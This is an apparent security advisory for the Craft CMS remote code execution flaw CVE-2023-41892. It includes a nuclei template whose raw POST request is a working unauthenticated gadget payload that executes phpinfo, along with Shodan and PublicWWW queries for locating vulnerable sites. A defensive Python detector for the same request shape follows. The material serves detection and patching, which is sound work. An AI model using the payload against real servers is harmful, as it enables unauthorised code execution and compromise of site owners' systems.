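CVE-2023-41892 | Craft CMS Remote Code Execution Vulnerability

0x00 Preface

Craft CMS is an open-source content management system. It focuses on a user-friendly content creation process and can be used to build personal or corporate websites as well as enterprise-grade e-commerce systems.

Craft's interface is clean and elegant, and its logic is clear. It is a highly flexible platform designed for extensive customization. Although it does not require professional programming knowledge, some familiarity with its template syntax is needed to use it well.

0x01 Vulnerability Description

Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. The issue has been fixed in Craft CMS 4.4.15.

0x02 CVE ID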

CVE-2023-41892

0x03 Affected Versions

Craft CMS >= 4.0.0-RC1

Craft CMS <= 4.4.14

0x04 Vulnerability Details

CVE-2023-41892.yaml

id: CVE-2023-41892

info:
  name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
  reference:
    - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
    - https://blog.calif.io/p/craftcms-rce
    - https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
    - https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
    - https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2023-41892
    cwe-id: CWE-94
    epss-score: 0.00044
    epss-percentile: 0.08209
  metadata:
    max-request: 1
    verified: true
    publicwww-query: "craftcms"
    shodan-query: http.favicon.hash:-47932290
  tags: cve,cve2023,rce,unauth,craftcms

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

    matchers:
      - type: word
        words:
          - "PHP Credits"
          - "PHP Group"
          - "CraftCMS"
        condition: and
        case-insensitive: true
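
A defender-side check for the request shape the template above sends, written as an added example (not part of the original post or the nuclei template): it parses a form-encoded POST body and, when `action` is `conditions/render`, reports any `as ` behavior key or `__construct()` key found inside `config`. The function names, sample bodies and placeholder class names are constructed, and treating those two keys as suspicious in a condition config is this example's assumption.

```python
import json
from urllib.parse import parse_qs, urlencode

# Markers taken from the template's request body; treating them as
# suspicious inside a condition config is this example's assumption.
BEHAVIOR_PREFIX = "as "      # Yii config syntax that attaches a behavior
CTOR_KEY = "__construct()"   # constructor arguments supplied via config


def _walk(node, hits):
    """Collect marker keys anywhere in the decoded JSON config."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key.startswith(BEHAVIOR_PREFIX):
                hits.add(BEHAVIOR_PREFIX)
            elif key == CTOR_KEY:
                hits.add(CTOR_KEY)
            _walk(value, hits)
    elif isinstance(node, list):
        for item in node:
            _walk(item, hits)


def inspect_body(body):
    """Return the sorted markers found in a form-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    if "conditions/render" not in fields.get("action", []):
        return []
    hits = set()
    for raw in fields.get("config", []):
        try:
            _walk(json.loads(raw), hits)
        except ValueError:
            # Not valid JSON (e.g. unescaped backslashes): substring fallback.
            hits.update(m for m in (BEHAVIOR_PREFIX, CTOR_KEY) if f'"{m}' in raw)
    return sorted(hits)


# Constructed sample bodies with placeholder class names.
_cfg = {"name": "x", "as demo": {"class": "Example\\Placeholder", CTOR_KEY: [{}]}}
SAMPLES = {
    "benign": urlencode({"action": "conditions/render", "config": '{"name":"x"}'}),
    "encoded": urlencode({"action": "conditions/render", "config": json.dumps(_cfg)}),
    "malformed": r'action=conditions/render&config={"name":"x","as demo":{"class":"\Example\Placeholder","__construct()":[{}]}}',
    "other_action": urlencode({"action": "users/login", "config": json.dumps(_cfg)}),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

The check only looks at the request body, as in the template; feed it bodies captured by a WAF or reverse proxy that logs POST data.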

0x05 References

https://nvd.nist.gov/vuln/detail/CVE-2023-41892